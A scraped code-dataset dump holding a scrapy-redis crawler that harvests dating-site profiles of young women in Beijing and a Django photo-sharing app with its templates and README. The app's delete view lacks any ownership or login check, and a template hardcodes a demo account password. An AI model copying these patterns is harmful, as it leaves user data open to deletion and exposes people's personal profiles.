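# Pushing a start URL wakes up every idle worker consuming this key.
r.lpush("you_yuan: start spider",
        "http://www.youyuan.com/find/beijing/mm18-26/advance-0-0-0-0-0-0-0/p1/")
```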
{
"alpha_fraction": 0.5783783793449402,
"alphanum_fraction": 0.6202702522277832,
"avg_line_length": 20.14285659790039,
"blob_id": "91181950ca761d36093e2ff9ee6aa8b0e933c376",
"content_id": "184a939071f3136ac202f238c12f66efe030d4ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 746,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 35,
"path": "/you_yuan/process_item_for_mongo.py",
"repo_name": "zhaoqidev/Affinity",
"src_encoding": "UTF-8",
"text": "# coding=utf-8\n\"\"\" \n@author: stromqi\n@file: process_item_for_mongo.py \n@email:[email protected]\n@time: 2018/04/05 \n@github: github.com/stromqi\n\"\"\"\n\nimport redis\nimport pymongo\nimport json\nimport scrapy.log\n\n\"\"\"\nredis mongo数据库\n\"\"\"\n\n\ndef process_item():\n redis_client = redis.Redis(host=\"127.0.0.1\", port=6379, db=\"0\")\n mongo_client = pymongo.MongoClient(host=\"127.0.0.1\", port=27017)\n db_name = mongo_client[\"youyuan\"]\n sheet_name = db_name[\"beijing_area_mm\"]\n\n while True:\n source, data = redis_client.blpop(\"yy:items\") # list[] or tuple()\n data = json.load(data)\n sheet_name.insert(data)\n scrapy.log.msg(\"log\" + source)\n scrapy.log.msg(\"log\" + data)\n\n\nif __name__ == '__main__':\n process_item()\n"
}
] | 3 |
Whiro0501/Django_SharePhoto
|
https://github.com/Whiro0501/Django_SharePhoto
|
9d7df46ee0487d8dbaf286860ac4063cf1bc04a9
|
fa4e162239094b20c58393f0baa7f8614c8de481
|
6dfdbe90dd8237ccbe15ab27b59fec2fcedeac4a
|
refs/heads/master
| 2022-12-12T12:57:38.036005 | 2020-02-16T13:51:48 | 2020-02-16T13:51:48 | 219,107,076 | 1 | 0 | null | 2019-11-02T05:13:59 | 2020-04-19T17:43:34 | 2022-12-08T05:23:35 |
C
|
[
{
"alpha_fraction": 0.513853907585144,
"alphanum_fraction": 0.5214105844497681,
"avg_line_length": 17.952381134033203,
"blob_id": "beb7e7011cb043d5419f94de6c6e27c940d68139",
"content_id": "13b7eab326f0df7e0b3d005c1cb1f61e134c6e08",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 451,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 21,
"path": "/app/templates/app/users_detail.html",
"repo_name": "Whiro0501/Django_SharePhoto",
"src_encoding": "UTF-8",
"text": "{% extends 'app/base.html' %}\n\n{% block content %}\n\n<h2 class=\"user-name\">@{{ user.username }}</h2>\n\n{% if photos.count != 0 %}\n <p>投稿<strong>{{ photos.count }}</strong>件</p>\n\n\n{% else %}\n {% if user == request.user %}\n <p>投稿が見つかりません</p>\n {% else %}\n <p>@{{ user.username }}さんはまだ投稿していません。</p>\n {% endif %}\n{% endif %}\n\n{% include 'app/photos_list.html' %}\n\n{% endblock %}"
},
{
"alpha_fraction": 0.6696990728378296,
"alphanum_fraction": 0.6696990728378296,
"avg_line_length": 56.15999984741211,
"blob_id": "24d80ece0e65e72ad2c1bf7fd79c723857f93b79",
"content_id": "7daf7df3468102b8e556377929b134cb5dcd3060",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1429,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 25,
"path": "/app/urls.py",
"repo_name": "Whiro0501/Django_SharePhoto",
"src_encoding": "UTF-8",
"text": "from django.urls import path\nfrom . import views\nfrom django.contrib.auth import views as auth_views\n\napp_name = 'app'\nurlpatterns = [\n path('', views.index, name='index'),\n path('users/<int:pk>/', views.users_detail, name='users_detail'),\n path('photos/new/', views.photos_new, name='photos_new'),\n path('photos/<int:pk>/', views.photos_detail, name='photos_detail'),\n path('photos/<int:pk>/delete/', views.photos_delete, name='photos_delete'),\n path('photos/<str:category>/', views.photos_category, name='photos_category'),\n path('signup/', views.signup, name='signup'),\n path('login/', auth_views.LoginView.as_view(template_name='app/login.html'), name='login'),\n path('logout/', auth_views.LogoutView.as_view(), name='logout'),\n path('contact/', views.contact, name='contact'),\n #path('testuser/', views.contact, name='testuser'),\n path('user_information/<int:pk>/', views.UserDetail.as_view(), name='user_information'),\n path('user_update/<int:pk>/', views.UserUpdate.as_view(), name='user_update'),\n path('password_change/', views.PasswordChange.as_view(), name='password_change'),\n path('password_change/done/', views.PasswordChangeDone.as_view(), name='password_change_done'),\n path('photos/<int:pk>/like/', views.like, name='like'),\n path('user_list/<int:pk>/', views.user_list, name='user_list'),\n path('user_list/<int:pk>/follow/', views.follow, name='follow'),\n]\n"
},
{
"alpha_fraction": 0.6553488969802856,
"alphanum_fraction": 0.6587192416191101,
"avg_line_length": 33.645023345947266,
"blob_id": "62d87c44950a99c59e20aa05faae95c93b7e6032",
"content_id": "ec52a1c8b4ff6ea88f7ec803e88eed66f502ac07",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8569,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 231,
"path": "/app/views.py",
"repo_name": "Whiro0501/Django_SharePhoto",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import get_object_or_404, redirect, render\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import PhotoForm, MyPasswordChangeForm, UserUpdateForm, ContactForm\nfrom django.contrib import messages\nfrom django.views.decorators.http import require_POST\nfrom .models import Photo, Category, Like, Follow\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.db.models import Q\nfrom django.core.mail import send_mail\nfrom django.contrib.auth.views import PasswordChangeView, PasswordChangeDoneView\nfrom django.urls import reverse_lazy\nfrom django.shortcuts import redirect, resolve_url\nfrom django.views import generic\nfrom django.contrib.auth.mixins import UserPassesTestMixin\nfrom django.http import HttpResponseRedirect\n\nclass OnlyYouMixin(UserPassesTestMixin):\n raise_exception = True\n\n def test_func(self):\n user = self.request.user\n return user.pk == self.kwargs['pk'] or user.is_superuser\n\n\nclass UserDetail(OnlyYouMixin, generic.DetailView):\n model = User\n template_name = 'app/user_detail.html'\n\n\nclass UserUpdate(OnlyYouMixin, generic.UpdateView):\n model = User\n form_class = UserUpdateForm\n template_name = 'app/user_form.html'\n\n def get_success_url(self):\n return resolve_url('app:user_detail', pk=self.kwargs['pk'])\n\nclass PasswordChange(PasswordChangeView):\n \"\"\"パスワード変更ビュー\"\"\"\n form_class = MyPasswordChangeForm\n success_url = reverse_lazy('app:password_change_done')\n template_name = 'app/password_change.html'\n\n\nclass PasswordChangeDone(PasswordChangeDoneView):\n \"\"\"パスワード変更しました\"\"\"\n template_name = 'app/password_change_done.html'\n\n\n\n\ndef paginate_queryset(request, queryset, count):\n\n paginator = Paginator(queryset, count)\n page = request.GET.get('page')\n try:\n page_obj = paginator.page(page)\n except PageNotAnInteger:\n page_obj = paginator.page(1)\n except EmptyPage:\n page_obj = paginator.page(paginator.num_pages)\n return page_obj\n\n\n\ndef index(request):\n photos = Photo.objects.all().order_by('-created_at')\n photo_filter = Photo.objects.all().order_by('-created_at')\n page_obj = paginate_queryset(request, photos, 6)\n keyword = request.GET.get('keyword')\n if keyword:\n page_obj = photos.filter(\n Q(title__icontains=keyword) | Q(comment__icontains=keyword)\n )\n context = {\n # 'photos': page_obj.object_list,\n 'photos': page_obj,\n 'page_obj': page_obj,\n 'keyword': photo_filter,\n }\n return render(request, 'app/index.html', context)\n\n\ndef users_detail(request, pk):\n user = get_object_or_404(User, pk=pk)\n #photo_filter = Photo.objects.all().order_by('-created_at', 'user').filter(user=pk)\n photo_filter = Photo.objects.all().order_by('-created_at')\n photos = user.photo_set.all().order_by('-created_at')\n page_obj = paginate_queryset(request, photos, 6)\n keyword = request.GET.get('keyword')\n if keyword:\n photos = photos.filter(\n Q(title__icontains=keyword) | Q(comment__icontains=keyword)\n )\n \"\"\"elseの中をいかにしたらできた。要はページングと被ってる\"\"\"\n else:\n photos = page_obj\n context = {\n 'user': user,\n 'photos': photos,\n 'page_obj': page_obj,\n 'keyword': photo_filter,\n }\n return render(request, 'app/users_detail.html', context)\n\ndef signup(request):\n if request.method == 'POST':\n form = UserCreationForm(request.POST) # ユーザーインスタンスを作成\n if form.is_valid():\n new_user = form.save() # 
ユーザーインスタンスを保存\n input_username = form.cleaned_data['username']\n input_password = form.cleaned_data['password1']\n # フォームの入力値で認証できればユーザーオブジェクト、できなければNoneを返す\n new_user = authenticate(username=input_username, password=input_password)\n # 認証成功時のみ、ユーザーをログインさせる\n if new_user is not None:\n # loginメソッドは、認証ができてなくてもログインさせることができる。→上のauthenticateで認証を実行する\n login(request, new_user)\n return redirect('app:users_detail', pk=new_user.pk)\n else:\n form = UserCreationForm()\n return render(request, 'app/signup.html', {'form': form})\n\n@login_required\ndef photos_new(request):\n keyword = request.GET.get('keyword')\n\n if request.method == \"POST\":\n form = PhotoForm(request.POST, request.FILES)\n if form.is_valid():\n photo = form.save(commit=False)\n photo.user = request.user\n photo.save()\n messages.success(request, \"投稿が完了しました!\") # 追加\n return redirect('app:users_detail', pk=request.user.pk)\n else:\n form = PhotoForm()\n return render(request, 'app/photos_new.html', {'form': form})\n\ndef photos_detail(request, pk):\n photo = get_object_or_404(Photo, pk=pk)\n return render(request, 'app/photos_detail.html', {'photo': photo})\n\n@require_POST\ndef photos_delete(request, pk):\n photo = get_object_or_404(Photo, pk=pk)\n photo.delete()\n return redirect('app:users_detail', request.user.id)\n\n\ndef photos_category(request, category):\n # titleがURLの文字列と一致するCategoryインスタンスを取得\n category = Category.objects.get(title=category)\n # 取得したCategoryに属するPhoto一覧を取得\n photos = Photo.objects.filter(category=category).order_by('-created_at')\n return render(request, 'app/index.html', {'photos': photos, 'category':category})\n\ndef contact(request):\n keyword = request.GET.get('keyword')\n\n if request.method == \"POST\":\n form = ContactForm(request.POST, request.FILES)\n if form.is_valid():\n cantact = form.save(commit=False)\n #cantact.user = request.user\n cantact.save()\n mail(request)\n messages.success(request, \"お問い合わせが完了しました!\") # 追加\n return redirect('app:index', )\n else:\n form = ContactForm()\n return render(request, 'app/contact.html', {'form': form})\n\ndef mail(request):\n\n if request.method == \"POST\":\n\n subject = request.POST.get('title')\n message = request.POST.get('content')\n from_email = request.POST.get('email')\n recipient_list = [\n \"[email protected]\"\n ]\n\n send_mail(subject, message, from_email, recipient_list)\n\n@login_required\ndef like(request, pk):\n photos = get_object_or_404(Photo, pk=pk)\n is_like = Like.objects.filter(user=request.user).filter(photos=photos).count()\n if is_like > 0:\n liking = Like.objects.get(user=request.user, photos_id=pk)\n liking.delete()\n photos.like_num -= 1\n photos.save()\n messages.warning(request, 'いいねを取り消しました')\n return redirect('app:photos_detail', photos.id)\n else:\n photos.like_num += 1\n photos.save()\n like = Like()\n like.user = request.user\n like.photos = photos\n like.save()\n messages.success(request, 'いいね!しました')\n return redirect('app:photos_detail', photos.id)\n\ndef user_list(request, pk):\n users = User.objects.all()\n follow = Follow.objects.all()\n request_user = get_object_or_404(User, pk=pk)\n # users = get_object_or_404(User)\n return render(request, 'app/user_list.html', {'users': users, 'request_user': request_user, 'follow': follow})\n\n@login_required\ndef follow(request, pk):\n follower = User.objects.get(username=request.user)\n following = User.objects.get(pk=pk)\n if follower == following:\n messages.warning(request, '自分自身はフォローできません')\n else:\n if not Follow.objects.filter(follower=follower, 
following=following).exists():\n Follow(follower=follower, following=following).save()\n messages.warning(request, 'フォローしました')\n else:\n Follow.objects.filter(follower=follower, following=following).delete()\n messages.warning(request, 'フォローを外しました')\n return redirect('app:user_list', request.user.id)\n\n\n\n\n\n\n\n\n"
},
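The `paginate_queryset` helper in the views above wraps Django's stdlib `Paginator`, clamping a non-integer `?page=` value to 1 and an out-of-range one to the last page. A self-contained sketch of the underlying behavior (any sliceable sequence works in place of a queryset):

```python
from django.core.paginator import Paginator

paginator = Paginator(range(1, 20), 6)  # 19 items, 6 per page -> 4 pages
page = paginator.page(1)

print(paginator.num_pages)        # 4
print(list(page.object_list))     # [1, 2, 3, 4, 5, 6]
print(page.has_next(), page.has_previous())  # True False
```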
{
"alpha_fraction": 0.6266582608222961,
"alphanum_fraction": 0.6266582608222961,
"avg_line_length": 28.88679313659668,
"blob_id": "0cdb69d81c2693f0d20247e482a1b15108ba1d63",
"content_id": "507d3dda6687cb90928f69a91da3bbc6862eea7d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1661,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 53,
"path": "/app/forms.py",
"repo_name": "Whiro0501/Django_SharePhoto",
"src_encoding": "UTF-8",
"text": "from django.forms import ModelForm\nfrom .models import Photo, Contact\nfrom django import forms\nfrom django.core.mail import send_mail\nfrom django.conf import settings\nfrom django.contrib.auth.forms import PasswordChangeForm\nfrom django.contrib.auth.models import User\n\nclass PhotoForm(ModelForm):\n class Meta:\n model = Photo\n fields = ['title', 'comment', 'image', 'category']\n\n\nclass ContactForm(ModelForm):\n class Meta:\n model = Contact\n fields = ['title', 'name', 'email', 'content']\n\nclass UserUpdateForm(forms.ModelForm):\n \"\"\"ユーザー情報更新フォーム\"\"\"\n\n class Meta:\n model = User\n fields = ('username', 'last_name', 'first_name', 'email')\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n for field in self.fields.values():\n field.widget.attrs['class'] = 'form-control'\n\n\nclass MyPasswordChangeForm(PasswordChangeForm):\n \"\"\"パスワード変更フォーム\"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n for field in self.fields.values():\n field.widget.attrs['class'] = 'form-control'\n\n\n # name = forms.CharField() # 名前\n # message = forms.CharField(widget=forms.Textarea) #問い合わせ内容\n #\n # # メール送信処理\n # def send_email(self):\n # # send email using the self.cleaned_data dictionary\n # subject = self.cleaned_data['name']\n # message = self.cleaned_data['message']\n # from_email = settings.EMAIL_BACKEND\n # #to = [settings.EMAIL_BACKEND\n #\n # send_mail(subject, message, from_email, to )"
},
{
"alpha_fraction": 0.692307710647583,
"alphanum_fraction": 0.692307710647583,
"avg_line_length": 26.962963104248047,
"blob_id": "4d3d3841a2f9b176ed83c85e446d251a25f4eac5",
"content_id": "c11563bba83baefd94c23173c3c3096c83d51795",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 754,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 27,
"path": "/app/admin.py",
"repo_name": "Whiro0501/Django_SharePhoto",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom .models import Photo, Category, Like, Follow\n\nclass CategoryAdmin(admin.ModelAdmin):\n list_display = ('id', 'title')\n list_display_links = ('id', 'title')\n\n\nclass PhotoAdmin(admin.ModelAdmin):\n list_display = ('id', 'title')\n list_display_links = ('id', 'title')\n\n\nclass LikeAdmin(admin.ModelAdmin):\n list_display = ('id', 'user', 'photos')\n list_display_links = ('id', 'user', 'photos')\n\n\nclass FollowAdmin(admin.ModelAdmin):\n list_display = ('id', 'follower', 'following')\n list_display_links = ('id', 'follower', 'following')\n\n\nadmin.site.register(Category, CategoryAdmin)\nadmin.site.register(Photo, PhotoAdmin)\nadmin.site.register(Like, LikeAdmin)\nadmin.site.register(Follow, FollowAdmin)"
},
{
"alpha_fraction": 0.7015404105186462,
"alphanum_fraction": 0.7079589366912842,
"avg_line_length": 31.47916603088379,
"blob_id": "40cfd20ab63e964c9e55a2f01ea3caeabd4fb6ad",
"content_id": "6ed120028dabe165ca5723066b4b01f911155379",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1570,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 48,
"path": "/app/models.py",
"repo_name": "Whiro0501/Django_SharePhoto",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.contrib.auth.models import User\n\n\n# Categoryモデルを作成\nclass Category(models.Model):\n title = models.CharField(max_length=20)\n\n def __str__(self):\n return self.title\n\n\nclass Photo(models.Model):\n title = models.CharField(max_length=150)\n comment = models.TextField(blank=True)\n image = models.ImageField(upload_to = 'photos')\n category = models.ForeignKey(Category, on_delete=models.PROTECT)\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n created_at = models.DateTimeField(auto_now=True)\n like_num = models.IntegerField(default=0)\n\n def __str__(self):\n return self.title\n\nclass Contact(models.Model):\n title = models.CharField(max_length=50)\n name = models.CharField(max_length=50)\n email = models.EmailField(blank=True)\n content = models.TextField(blank=False)\n created_at = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return self.title\n\n\nclass Like(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE,)\n photos = models.ForeignKey(Photo, on_delete=models.CASCADE)\n date_created = models.DateTimeField(auto_now_add=True)\n\n\nclass Follow(models.Model):\n follower = models.ForeignKey(User, related_name='follower', on_delete=models.CASCADE)\n following = models.ForeignKey(User, related_name='following', on_delete=models.CASCADE)\n date_created = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return \"{} : {}\".format(self.follower.username, self.following.username)"
},
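The models above imply several reverse relations that the views rely on. A sketch of the resulting ORM queries — this must run inside a configured Django project for this app, and `User.objects.first()` assumes at least one user exists:

```python
from django.contrib.auth.models import User

user = User.objects.first()

user.photo_set.all()    # photos posted by the user (default reverse name)
user.follower.all()     # Follow rows where the user is the follower
user.following.all()    # Follow rows where the user is being followed

# Reverse FK lookup from Photo through Like: photos this user has liked.
Photo = user.photo_set.model
Photo.objects.filter(like__user=user)
```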
{
"alpha_fraction": 0.5830346345901489,
"alphanum_fraction": 0.5902031064033508,
"avg_line_length": 25.1875,
"blob_id": "4a8260ca6e3ab31020e7ea13582f21e1541d80eb",
"content_id": "2992a1103226566209651ab8cc684b218152e050",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 931,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 32,
"path": "/app/templates/app/signup.html",
"repo_name": "Whiro0501/Django_SharePhoto",
"src_encoding": "UTF-8",
"text": "{% extends 'app/base.html' %}\n\n{% block content %}\n\n<h2>サインアップ</h2>\n\n<form method=\"post\" action=\"{% url 'app:signup' %}\">{% csrf_token %}\n <label>ユーザー名</label>\n {{ form.username }}\n {{ form.username.errors }}\n <br>\n <label>パスワード</label>\n {{ form.password1 }}\n {{ form.password1.errors }}\n <br>\n <label>パスワード(確認)</label>\n {{ form.password2 }}\n {{ form.password2.errors }}\n <br>\n <input type=\"submit\" value=\"登録する\">\n</form>\n\n<p><a href=\"{% url 'app:login' %}\">ログインはこちら</a></p>\n\n<form class=\"\" method=\"post\" action=\"{% url 'app:login' %}\">{% csrf_token %} \n\n <input type=\"hidden\" value=\"testuser\" name=\"username\">\n <input type=\"hidden\" value=\"Testp@ssw0rd\" name=\"password\">\n <input type=\"submit\" class=\"btn btn-primarybtn btn-primary\" name=\"testuser\" value=\"テストユーザでログイン\">\n</form>\n\n{% endblock %}"
},
{
"alpha_fraction": 0.49473685026168823,
"alphanum_fraction": 0.5789473652839661,
"avg_line_length": 20.11111068725586,
"blob_id": "f84c6353d37bf74fc8ce7a580b17dd442b0f33b0",
"content_id": "64144778c6ee0360a54e558b4cb2501fa6fcd919",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 380,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 18,
"path": "/app/migrations/0008_photo_like_num.py",
"repo_name": "Whiro0501/Django_SharePhoto",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.2.3 on 2019-07-27 14:17\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('app', '0007_auto_20190727_2016'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='photo',\n name='like_num',\n field=models.IntegerField(default=0),\n ),\n ]\n"
},
{
"alpha_fraction": 0.48973608016967773,
"alphanum_fraction": 0.5454545617103577,
"avg_line_length": 17.94444465637207,
"blob_id": "d02f3917abba496227809921681ed0c3fa2cd02c",
"content_id": "989d5d4f0694de6cf211510b56585b1fa0fb67cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 341,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 18,
"path": "/app/migrations/0007_auto_20190727_2016.py",
"repo_name": "Whiro0501/Django_SharePhoto",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.2.3 on 2019-07-27 11:16\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('app', '0006_like'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='like',\n old_name='post',\n new_name='photos',\n ),\n ]\n"
},
{
"alpha_fraction": 0.7180650234222412,
"alphanum_fraction": 0.7505668997764587,
"avg_line_length": 14.325581550598145,
"blob_id": "cd6697d9460e148e37a5007ecb6f66a4c6a30e60",
"content_id": "2b1ca269f1f9456d2acf12d9513feee89814ed3d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2659,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 86,
"path": "/README.md",
"repo_name": "Whiro0501/Django_SharePhoto",
"src_encoding": "UTF-8",
"text": "# Hirogram\n自分の大好きなことを友達に共有するアプリです。\n※現在アプリは停止しています。\n\n<img alt=\"トップ\" src=\"https://user-images.githubusercontent.com/36604680/68087603-e4e2d380-fe9a-11e9-8c5d-7fa915fbf1c8.png\" />\n\n\nURL: https://hirogram.ga\n\n# 使用技術\n\n- Python 3.7.3\n- Django 2.2.3\n- SQlite3\n- bootstrap\n- jQuery\n- AWS\n - EC2\n - VPC\n - Subnet\n - Internet Getway\n - ALB\n - ACM\n - Route53\n - CloudWatch\n - IAM\n - スナップショット\n- Github\n- Pycharm\n\n# 開発環境\nエディターにはPycharmを使用しアプリの開発を行いました。\n\n# 本番環境\n本番環境はAWSへデプロイしました。\n\nAWSに関しては、このアプリでの開発ではシンプルな構成としました。\n\n理由としては別にRailsでアプリを開発しており、そちらでDockerの開発環境、\nCI/CDの自動化やECSなどでオートスケーリングを行なっているからです。\n\n# 機能一覧\n- 記事機能\n - タイムライン(新着順)\n - ユーザ投稿一覧(新着順)\n - 画像アップロード\n - 記事投稿機能\n - ページネーション機能\n- ユーザ機能\n - ユーザ登録・ログインログアウト機能全般\n - ユーザ 一覧表示機能\n - 簡単ログイン\n- フォロー機能\n -相互フォロー機能\n- いいね機能\n - 投稿記事へのいいね\n- 管理者機能\n- ダグ機能\n - タグ検索\n- 検索機能\n - title、bodyの検索\n- お問い合わせ機能\n- プロフィール情報\n - ユーザ情報変更\n - ユーザ 一覧表示機能\n - ユーザ 一覧表示機能\n - パスワード変更機能\n\n# 頑張ったところ\n -アプリケーションの機能の多さ\n \n -DjangoはRailsと比べて日本語の資料が圧倒的に少ないため\n Djangoでポートフォリオを作ること自体が難しかったが、\n 自分でQiitaやチュートリアル、海外サイトを通して\n 情報を収集したため、その自走力を見ていただきたい。\n\n-個人的にはPythonの文法がある程度分かっているためか、\n RailsよりDjangoの方が簡単だったと思える。\n\n# 改善点\n-Djangoでの開発時にGithubの使い方を知らず、\n PushしていなかったためGithubを想定した開発ができなかった。\n しかし次に行なっているRailsでの開発にてGithubを使用して開発を行なっている。\n\n-時間が無くAWSやDockerでの実装ができなかった。\n こちらもRailsでの開発にてメインで実装しているためインフラ部分もアピールできると思われる。\n \n\n\n\n"
}
] | 10 |
Olmer1st/simple_tasks
|
https://github.com/Olmer1st/simple_tasks
|
4d8f6a2bc96d05bc7a42192dd858516e6445199d
|
5f5ccc3756d4882a38a5dfd8ecf8e34c0bff9a26
|
d1d474f81cf2a0d4a58b074e5d6edef86568bf47
|
refs/heads/master
| 2016-09-13T02:43:24.769632 | 2016-05-29T13:55:58 | 2016-05-29T13:55:58 | 57,590,443 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 17,
"blob_id": "f935f1725912d388585d99d7400ad2b312306f2c",
"content_id": "f300ac872682d4aa224dda24cce25a5116f2edbb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 36,
"license_type": "no_license",
"max_line_length": 18,
"num_lines": 2,
"path": "/middleware/authentication.py",
"repo_name": "Olmer1st/simple_tasks",
"src_encoding": "UTF-8",
"text": "def check_token():\n return False\n"
},
{
"alpha_fraction": 0.7749999761581421,
"alphanum_fraction": 0.7749999761581421,
"avg_line_length": 18,
"blob_id": "6478e37f70e9d24f92e5e834122517b58048f3ca",
"content_id": "ddca480bd062b8b27fb282788c034bc6ae6e9e3c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 40,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 2,
"path": "/README.md",
"repo_name": "Olmer1st/simple_tasks",
"src_encoding": "UTF-8",
"text": "# simple_tasks\nSimple tasks managment\n\n\n"
},
{
"alpha_fraction": 0.40306681394577026,
"alphanum_fraction": 0.40306681394577026,
"avg_line_length": 22.41025733947754,
"blob_id": "68581b96b138fbc23933e6820f2aed00aaf14694",
"content_id": "a5adff81d1ec1492baf3e95dbe0ea8c44025b174",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 913,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 39,
"path": "/public/javascript/controllers/homeController.js",
"repo_name": "Olmer1st/simple_tasks",
"src_encoding": "UTF-8",
"text": "\"use strict\";\nmain_app.controller(\"homeController\", function($scope, $rootScope, $location) {\n $scope.categories = {\n values: [{\n name: \"Releases\",\n desc: \"Release managment\",\n title: \"Release managment\",\n status: {\n open: false\n }\n }, {\n name: \"Maintenance\",\n desc: \"Maintenance managment\",\n title: \"Application support\",\n status: {\n open: false\n }\n }, {\n name: \"Projects\",\n desc: \"Projects managment\",\n title: \"Projects managment\",\n status: {\n open: false\n }\n }, {\n name: \"IT\",\n desc: \"IT managment\",\n title: \"IT managment\",\n status: {\n open: false\n }\n }],\n isOpen: true\n\n };\n\n\n\n});\n"
},
{
"alpha_fraction": 0.6599099040031433,
"alphanum_fraction": 0.6599099040031433,
"avg_line_length": 28.600000381469727,
"blob_id": "5400116672509b916618d78437004e919bac2975",
"content_id": "3468eb3e9fdaa50aa4e46f48e19675aaf7fd2fc3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 444,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 15,
"path": "/app.py",
"repo_name": "Olmer1st/simple_tasks",
"src_encoding": "UTF-8",
"text": "import os\nfrom flask import Flask, render_template\n\n# template_dir = os.path.dirname(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))\n# template_dir = os.path.join(template_dir, 'public')\napp = Flask(__name__, template_folder='public', static_folder='public')\n\[email protected]('/', defaults={'p': 'home'})\[email protected]('/<path:p>')\ndef main(p):\n return render_template('index.html')\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n"
},
{
"alpha_fraction": 0.5289443731307983,
"alphanum_fraction": 0.5300794839859009,
"avg_line_length": 30.464284896850586,
"blob_id": "a05342ac7f23578972b78cf202b7d32b26364658",
"content_id": "374203bffb39855961f26c47fe8d8d27e9d329c2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 881,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 28,
"path": "/public/javascript/app.js",
"repo_name": "Olmer1st/simple_tasks",
"src_encoding": "UTF-8",
"text": "\"use strict\";\nvar main_app = angular.module('main_app', ['ngSanitize','ui.router', 'ui.bootstrap', 'ngCookies']);\n\n\nmain_app.config(function ($locationProvider) {\n $locationProvider.html5Mode(true);\n});\n\nmain_app.config(function ($stateProvider, $urlRouterProvider) {\n $stateProvider\n .state('home', {\n url: '/home',\n templateUrl: 'public/partials/content.html',\n controller: 'homeController'\n })\n .state('login', {\n url: '/login',\n templateUrl: 'public/partials/login.html',\n controller: 'loginController'\n })\n .state('admin', {\n url: '/admin',\n templateUrl: 'public/partials/admin.html',\n controller: 'adminController'\n });\n\n $urlRouterProvider.otherwise('/home');\n});\n"
}
] | 5 |
zyx1001/plate_detection
|
https://github.com/zyx1001/plate_detection
|
d5e287880ea27d1fd70f8ee13d612a9677fc7674
|
20eca6c5e1a2a6982869ae5d19da97ac9e94f3b5
|
2405c57296cbe3d9328ddcb81dba282b358a60f7
|
refs/heads/master
| 2020-11-28T22:49:44.338357 | 2019-12-24T14:46:42 | 2019-12-24T14:46:42 | 229,941,140 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5661538243293762,
"alphanum_fraction": 0.6553846001625061,
"avg_line_length": 26.16666603088379,
"blob_id": "c02e6d1c021e288ef11e00e82e9db079846b8663",
"content_id": "48de8e8f46ed661cd8ea8e92512ece5ec3ec426b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 325,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 12,
"path": "/src/test.py",
"repo_name": "zyx1001/plate_detection",
"src_encoding": "UTF-8",
